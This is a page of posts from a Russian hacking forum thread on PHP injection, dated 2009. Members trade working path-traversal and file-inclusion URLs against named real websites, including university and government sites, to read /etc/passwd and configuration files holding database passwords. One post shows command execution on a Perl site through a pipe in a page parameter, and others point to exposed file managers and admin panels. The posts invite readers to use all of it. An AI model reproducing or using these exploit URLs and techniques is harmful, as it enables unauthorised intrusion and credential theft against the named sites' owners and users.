HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 82 из 143 « Первая < 3272 78 79 80 81 82 83 84 85 86 92132 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #811  
Старый 30.01.2009, 00:40
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
По умолчанию
Цитата:
Сообщение от The matrix  
Код:
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах
Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl
Код:
http://fleaket.com/index.pl?page=index.pl
из содержания можно понять.

Его болезнь
Код:
if (open(PAGE, $page))
стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
Код:
http://fleaket.com/index.pl?page=/|id|
]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)

Код:
http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget

Вроди как робит вгет, кому надо забирайте.

Еще из исходника понял, что продукт называется
PhoneBox
 
Ответить с цитированием

  #812  
Старый 01.02.2009, 20:07
vikseriq
Участник форума
Регистрация: 31.07.2008
Сообщений: 207
Провел на форуме:
299231

Репутация: 107
По умолчанию
уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )

___
Спс скажи ++!
 
Ответить с цитированием

  #813  
Старый 01.02.2009, 20:11
vikseriq
Участник форума
Регистрация: 31.07.2008
Сообщений: 207
Провел на форуме:
299231

Репутация: 107
По умолчанию
Хотя ладно, пользуйтесь на здоровье:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd
 
Ответить с цитированием

  #814  
Старый 02.02.2009, 09:24
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию
Десяток. PR разношерстный.
Цитата:
http://protan.ru/page3.php?open=../../../../../etc/passwd
http://www.deweydoes.org/index.php?page=../../../../../../../etc/passwd
http://www.ulpan.net/index.php?menu=start&page=../../../../etc/passwd
http://www.scheduledairlinefailure.co.uk/index.php?page=../../../../etc/passwd
http://deserteuropean.com/content.html?page=../../../../../../etc/passwd
http://www.dumamanzi.co.za/index.php?page=../../../../etc/passwd OR etc/shadow(черный текст на черном фоне)
http://www.kerryjohnson.com/index12.php?page=../../../etc/passwd
https://www.asmic.co.jp/asmic.php?page=../../../../etc/passwd
http://amhet.com/?page=../../../../../../etc/passwd
http://www.ansicom.net/main.php?page=../images/pic1.jpg
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #815  
Старый 02.02.2009, 15:55
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Edu
Цитата:
http://disability.ucdavis.edu/news_retrieve.php?Article=../../../boot.ini
windows
 
Ответить с цитированием

  #816  
Старый 03.02.2009, 14:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #817  
Старый 06.02.2009, 15:38
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
edu
есть пхпмайадмин))
Цитата:
http://duck.creighton.edu/index.php?target=../../../../../etc/passwd
Цитата:
http://elab.njit.edu/seio/index.php?page_link=../../../../../../../../etc/passwd&menu=6&page_name=Section+des+membres
Последний раз редактировалось $n@ke; 06.02.2009 в 15:50..
 
Ответить с цитированием

  #818  
Старый 06.02.2009, 17:56
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
Код:
http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd
Код:
http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=)
 
Ответить с цитированием

  #819  
Старый 06.02.2009, 20:24
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
GAV-GAV =)
Цитата:
http://partcfitpvt.vermont.gov/parental_rights.php?show=../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #820  
Старый 08.02.2009, 18:14
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
gpec.ubc.ca PR5
Код:
http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
Админка:
Код:
http://www.gpec.ubc.ca/admin/
C basic авторизацией =)
Ну админка лысая =) ее можно посмотреть вот так:
Код:
http://www.gpec.ubc.ca/index.php?content=admin/index.php
 
Ответить с цитированием
Ответ
Страница 82 из 143 « Первая < 3272 78 79 80 81 82 83 84 85 86 92132 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.